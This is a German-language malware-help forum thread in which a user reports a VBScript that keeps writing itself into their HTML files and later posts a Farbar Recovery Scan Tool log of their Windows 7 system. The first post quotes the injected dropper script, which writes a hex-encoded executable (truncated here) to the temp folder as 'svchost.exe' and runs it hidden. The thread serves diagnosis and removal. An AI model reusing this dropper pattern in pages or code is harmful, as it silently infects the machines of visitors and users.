| |
| |||||||
Log-Analyse und Auswertung: Java Drive ByWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML |
 |
06.03.2014, 19:38
| #1 |
| |  Java Drive By Moinsen, ich habe seit kurzem das Problem, dass sich ein Vb-Skript ständig in meine Html Dokumente schreibt. Kenne mich schon ein wenig in der Szene aus und habe mir wohl durch einen Java Drive By etwas eingefangen. Jedenfalls verteilt sich das Teil quer durchs System und auch über die Festplatten. Aber nur in Html Dokumenten. Javascript Dokumente habe ich schon durchgeguckt und konnte nichts finden. Hier ein Auszug: <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF......." Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT> Nun die Frage. Lässt sich da noch was machen, oder sollte ich mein System einmal komplett wieder neu aufsetzen? Mein Kumpel hatte dies auch mal, nur sein Problem war, dass sich der Virus trotz Formatierung, immer neu verteilt hat. Wahrscheinlich wegen den Html Dokumenten. |
|
06.03.2014, 23:29
| #2 |
| /// Winkelfunktion /// TB-Süch-Tiger™   | Java Drive By Hallo und
__________________ Hast du noch weitere Logs (mit Funden)? Malwarebytes und/oder andere Virenscanner, sind die mal fündig geworden? Ich frage deswegen nach => http://www.trojaner-board.de/125889-...tml#post941520 Bitte keine neuen Virenscans machen sondern erst nur schon vorhandene Logs in CODE-Tags posten! Relevant sind nur Logs der letzten 7 Tage bzw. seitdem das Problem besteht! Zudem bitte auch ein Log mit Farbars Tool machen: Scan mit Farbar's Recovery Scan Tool (FRST) Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
 Lesestoff:Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert mir massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu gross für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ |
|
07.03.2014, 15:55
| #3 | |
| | Java Drive ByZitat:
Hier einmal die Ergebnisse. FRST Logfile: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 06-03-2014
Ran by AweZome (administrator) on AZEX on 07-03-2014 15:45:33
Running from C:\Users\AweZome\Downloads
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 10
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(AMD) C:\Windows\system32\atiesrxx.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Nero AG) C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Teo Eterovic) C:\Program Files (x86)\PokIt\PokIt.exe
() C:\Program Files (x86)\SHARKOON DarkGlider\hid.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
() C:\Program Files (x86)\SHARKOON DarkGlider\trayicon.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
() C:\Program Files (x86)\HTC\HTC Sync Manager\HTC Sync\adb.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncV1\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_152.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_152.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
==================== Registry (Whitelisted) ==================
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13513288 2013-03-29] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472984 2013-12-10] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SHARKOON DarkGlider] - C:\Program Files (x86)\SHARKOON DarkGlider\hid.exe [295936 2012-11-28] ()
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [3814736 2014-02-26] (LogMeIn Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] - C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2239376 2014-02-11] (Adobe Systems Incorporated)
HKLM-x32\...\Winlogon: [Userinit] userinit.exe,,c:\users\awezome\microsoft\desktoplayer.exe,c:\program files (x86)\microsoft\desktoplayer.exe [X]
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\Run: [AdobeBridge] - [X]
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\Run: [LiveSupport] - "C:\Program Files (x86)\LiveSupport\LiveSupport.exe" /noshow /log
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\MountPoints2: E - E:\Autorun.exe
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\MountPoints2: {3cb7b203-5698-11e3-b8d4-f983bd413bdd} - G:\HTC_Sync_Manager_PC.exe
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\MountPoints2: {5548400f-dc9b-11e2-b10b-005056c00008} - E:\SETUP.EXE
HKU\S-1-5-21-1211402271-4041050587-2942217897-1000\...\MountPoints2: {b97f2b40-f6e9-11e2-b989-99e0acd5e924} - H:\HTC_Sync_Manager_PC.exe
AppInit_DLLs-x32: c:\progra~2\websea~1\sprote~1.dll => "c:\progra~2\websea~1\sprote~1.dll" File Not Found
Startup: C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VersaVPN.lnk
ShortcutTarget: VersaVPN.lnk -> C:\Program Files (x86)\VersaVPN\run_versavpn.exe (VersaVPN)
==================== Internet (Whitelisted) ====================
ProxyServer: 89.106.14.236:3128
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x4FF9CC73674ACE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = google.de
SearchScopes: HKLM-x32 - {BB74DE59-BC4C-4172-9AC4-73315F71CFFE} URL =
SearchScopes: HKCU - DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = google.de
SearchScopes: HKCU - {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = google.de
BHO: SteadyVideoBHO Class - {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll (Advanced Micro Devices)
BHO: DVDVideoSoft WebPageAdjuster Class - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns64.dll (DVDVideoSoft Ltd.)
BHO: Hotspot Shield Class - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - C:\Program Files (x86)\Hotspot Shield\HssIE\HssIE_64.dll No File
BHO-x32: DivX Plus Web Player HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
BHO-x32: SteadyVideoBHO Class - {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} - C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll (Advanced Micro Devices)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: DVDVideoSoft WebPageAdjuster Class - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns.dll (DVDVideoSoft Ltd.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{AE54CB51-16F8-48B3-ABF9-9517784C1F1F}: [NameServer]8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{BDDA1491-6B32-4CB1-B0C7-B12E6D97DE08}: [NameServer]8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
FireFox:
========
FF ProfilePath: C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default
FF user.js: detected! => C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\user.js
FF NewTab: google.de
FF SearchEngineOrder.1: WebSearch
FF SearchEngineOrder.user_pref("browser.search.order.1,S", "WebSearch");: user_pref("browser.search.order.1,S", "WebSearch");
FF SelectedSearchEngine: Google
FF Homepage: hxxp://de.msn.com/
FF Keyword.URL: google.de
FF NetworkProxy: "autoconfig_url", "data:text/javascript,function%20FindProxyForURL(url%2C%20host)%20%7Bif%20(shExpMatch(url%2C%20'http%3A%2F%2Fwww.crunchyroll.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fplay.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fplay.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fwww.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fwww.daisuki.net*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fsongza.com*')%20%7C%7C%20(url.indexOf('proxmate%3Dactive')%20!%3D%20-1%20%26%26%20url.indexOf('amazonaws.com')%20%3D%3D%20-1)%20%7C%7C%20(url.indexOf('proxmate%3Dus')%20!%3D%20-1)%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Faccount.beatsmusic.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.beatsmusic.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.rdio.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fsecure.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.last.fm*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fext.last.fm*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fpiki.fm*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fpiki.fm*')%20%7C%7C%20url.indexOf('discoverymedia.com')%20!%3D%20-1%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fdsc.discovery.com%2F*'))%20%7B%20return%20'PROXY%20nq-us05.personalitycores.com%3A8000%3B%20PROXY%20nq-us07.personalitycores.com%3A8000%3B%20PROXY%20nq-us11.personalitycores.com%3A8000%3B%20PROXY%20nq-us12.personalitycores.com%3A8000%3B%20PROXY%20nq-us06.personalitycores.com%3A8000%3B%20PROXY%20nq-us09.personalitycores.com%3A8000%3B%20PROXY%20nq-us04.personalitycores.com%3A8000%3B%20PROXY%20nq-us10.personalitycores.com%3A8000%3B%20PROXY%20nq-us08.personalitycores.com%3A8000'%3B%7D%20%20else%20%7B%20return%20'DIRECT'%3B%20%7D%7D"
FF NetworkProxy: "ftp", "212.116.131.205"
FF NetworkProxy: "ftp_port", 8080
FF NetworkProxy: "http", "212.116.131.205"
FF NetworkProxy: "http_port", 8080
FF NetworkProxy: "no_proxies_on", "localhost, 127.0.0.1, stealthy.co"
FF NetworkProxy: "share_proxy_settings", true
FF NetworkProxy: "socks", "212.116.131.205"
FF NetworkProxy: "socks_port", 8080
FF NetworkProxy: "ssl", "212.116.131.205"
FF NetworkProxy: "ssl_port", 8080
FF NetworkProxy: "type", 2
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_152.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @videolan.org/vlc,version=2.1.0 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.1.1 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 - C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_152.dll ()
FF Plugin-x32: @divx.com/DivX Plus Web Player Plug-In,version=1.0.0 - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 - C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: ubisoft.com/uplaypc - C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll ()
FF SearchPlugin: C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\searchplugins\conduit-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: FireShot - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba} [2014-01-28]
FF Extension: Live HTTP Headers - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a} [2013-12-10]
FF Extension: Block site - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{dd3d7613-0246-469d-bc65-2a3cc1668adc} [2013-08-10]
FF Extension: about:addons-memory - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\about-addons-memory@tn123.org.xpi [2013-10-12]
FF Extension: Exif Viewer - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\exif_viewer@mozilla.doslash.org.xpi [2013-10-15]
FF Extension: MEGA - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\firefox@mega.co.nz.xpi [2013-11-22]
FF Extension: ipFuck - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\ipfuck@p4ul.info.xpi [2013-10-15]
FF Extension: YouTube HD - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\jid0-HbNL9qqBkuuKRhJ9ncTonCky1HU@jetpack.xpi [2013-10-06]
FF Extension: YouTube ALL HTML5 - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2013-10-07]
FF Extension: ProxMate - Proxy on steroids! - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\jid1-QpHD8URtZWJC2A@jetpack.xpi [2013-08-16]
FF Extension: NASA Night Launch - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\nasanightlaunch@example.com.xpi [2013-05-06]
FF Extension: PricePeep - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\pricepeep@getpricepeep.com.xpi [2013-12-20]
FF Extension: Adblock Plus - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-05-07]
FF Extension: DownThemAll! - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2013-11-18]
FF Extension: Greasemonkey - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2013-12-31]
FF Extension: HackBar - C:\Users\AweZome\AppData\Roaming\Mozilla\Firefox\Profiles\qufspu5p.default\Extensions\{F5DDF39C-9293-4d5e-9AA8-E04E6DD5E9B4}.xpi [2013-12-10]
FF HKLM-x32\...\Firefox\Extensions: [{ACAA314B-EEBA-48e4-AD47-84E31C44796C}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff\
FF Extension: DVDVideoSoft YouTube MP3 and Video Download - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff\ []
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013-06-07]
Chrome:
=======
CHR HomePage: hxxp://google.de/
CHR Extension: (Google Docs) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-06]
CHR Extension: (Google Drive) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-06]
CHR Extension: (YouTube) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-10-06]
CHR Extension: (Google-Suche) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-10-06]
CHR Extension: (DVDVideoSoft Browser Extension) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\nikpibnbobmbdbheedjfogjlikpgpnhp [2013-10-06]
CHR Extension: (Google Wallet) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-06]
CHR Extension: (Mehr Leistung und Videoformate für dein HTML5 <video>) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2013-10-06]
CHR Extension: (Google Mail) - C:\Users\AweZome\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-10-06]
CHR HKCU\...\Chrome\Extension: [nikpibnbobmbdbheedjfogjlikpgpnhp] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\DVDVideoSoftBrowserExtension.crx [2013-05-16]
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2013-05-06]
==================== Services (Whitelisted) =================
S4 AcuWVSSchedulerv8; C:\Program Files (x86)\Acunetix\Web Vulnerability Scanner 8\WVSScheduler.exe [1009840 2012-07-04] ()
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2013-09-26] (Advanced Micro Devices, Inc.)
S4 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [26600 2013-10-08] (CyberGhost S.R.L)
R2 HTCMonitorService; C:\Program Files (x86)\HTC\HTC Sync Manager\HSMServiceEntry.exe [87368 2013-11-10] (Nero AG)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-02-26] (LogMeIn, Inc.)
S4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
S4 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
S4 PassThru Service; C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [167424 2012-12-07] ()
S4 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S4 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [186056 2013-10-16] (Sandboxie Holdings, LLC)
S4 TlntSvr; C:\Windows\System32\tlntsvr.exe [81920 2009-07-14] (Microsoft Corporation)
S4 WTService; C:\Windows\system32\atwtusb.exe [916992 2011-04-27] ()
==================== Drivers (Whitelisted) ====================
R2 AODDriver4.2.0; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [42240 2013-07-31] (Advanced Micro Devices)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2013-06-24] (DT Soft Ltd)
S3 HtcVCom32; C:\Windows\System32\DRIVERS\HtcVComV64.sys [121800 2010-03-09] (QUALCOMM Incorporated)
R3 KeyScrambler; C:\Windows\System32\drivers\keyscrambler.sys [222200 2013-05-31] (QFX Software Corporation)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R3 moufiltr; C:\Windows\System32\DRIVERS\moufiltr.sys [7680 2009-03-08] (Windows (R) Codename Longhorn DDK provider)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R1 ntiopnp; C:\Windows\System32\Drivers\ntiopnp.sys [19544 2010-11-11] ()
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13368 2013-01-23] ()
S3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [200552 2013-10-16] (Sandboxie Holdings, LLC)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-14] (Brother Industries Ltd.)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2013-04-24] (Anchorfree Inc.)
R3 vhidmini; C:\Windows\System32\DRIVERS\walvhid.sys [7552 2009-08-26] (Windows (R) Win 7 DDK provider)
R1 vmm; C:\Windows\system32\Treiber\vmm.sys [296816 2007-02-17] (Microsoft Corporation)
R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [31824 2013-02-26] (VMware, Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [70296 2012-10-24] (VMware, Inc.)
S3 WinRing0_1_2_0; C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [14544 2010-11-01] (OpenLibSys.org)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
==================== NetSvcs (Whitelisted) ===================
==================== One Month Created Files and Folders ========
2099-05-14 13:56 - 2013-05-15 16:14 - 00000000 ____D () C:\Program Files\NewBlue
2014-03-06 19:48 - 2014-03-07 15:45 - 00021283 _____ () C:\Users\AweZome\Downloads\FRST.txt
2014-03-06 19:48 - 2014-03-06 19:48 - 00000000 ____D () C:\FRST
2014-03-06 19:47 - 2014-03-06 19:47 - 02156544 _____ (Farbar) C:\Users\AweZome\Downloads\FRST64.exe
2014-03-06 16:52 - 2014-03-06 16:57 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Telegram Win (Unofficial)
2014-03-06 16:52 - 2014-03-06 16:52 - 05986694 _____ (Telegram (Unofficial) ) C:\Users\AweZome\Downloads\tsetup.0.3.7.exe
2014-03-06 16:52 - 2014-03-06 16:52 - 00001018 _____ () C:\Users\AweZome\Desktop\Telegram.lnk
2014-03-06 16:52 - 2014-03-06 16:52 - 00000000 ____D () C:\Users\AweZome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram Win (Unofficial)
2014-03-05 21:57 - 2014-03-05 21:59 - 00000000 ____D () C:\Users\AweZome\Desktop\Office
2014-03-05 17:58 - 2014-03-05 17:58 - 02119580 _____ () C:\Users\AweZome\Desktop\Trei2.psd
2014-03-05 17:18 - 2014-03-05 17:18 - 03666833 _____ () C:\Users\AweZome\Desktop\AcarajePlays-TAG.psd
2014-03-04 20:20 - 2014-03-04 20:20 - 00281736 _____ () C:\Users\AweZome\Desktop\dark horse rmx.sfk
2014-03-04 20:17 - 2014-03-04 20:20 - 00000000 ____D () C:\Users\AweZome\Desktop\Download
2014-03-04 18:06 - 2014-03-04 18:07 - 12461457 _____ () C:\Users\AweZome\Desktop\Ohne Titel.wmv
2014-03-04 15:11 - 2014-03-04 15:11 - 00000000 ____D () C:\Users\AweZome\Desktop\Adamerek's MW2 Prereck Pack P1
2014-03-04 15:08 - 2014-03-04 15:03 - 36053658 _____ () C:\Users\AweZome\Desktop\dark horse rmx.wav
2014-03-04 15:02 - 2014-03-04 15:02 - 00000000 ____D () C:\Users\AweZome\Desktop\Things Cod4 [Prerec]
2014-03-04 14:59 - 2014-03-04 15:03 - 36053658 _____ () C:\Users\AweZome\Downloads\dark horse rmx.wav
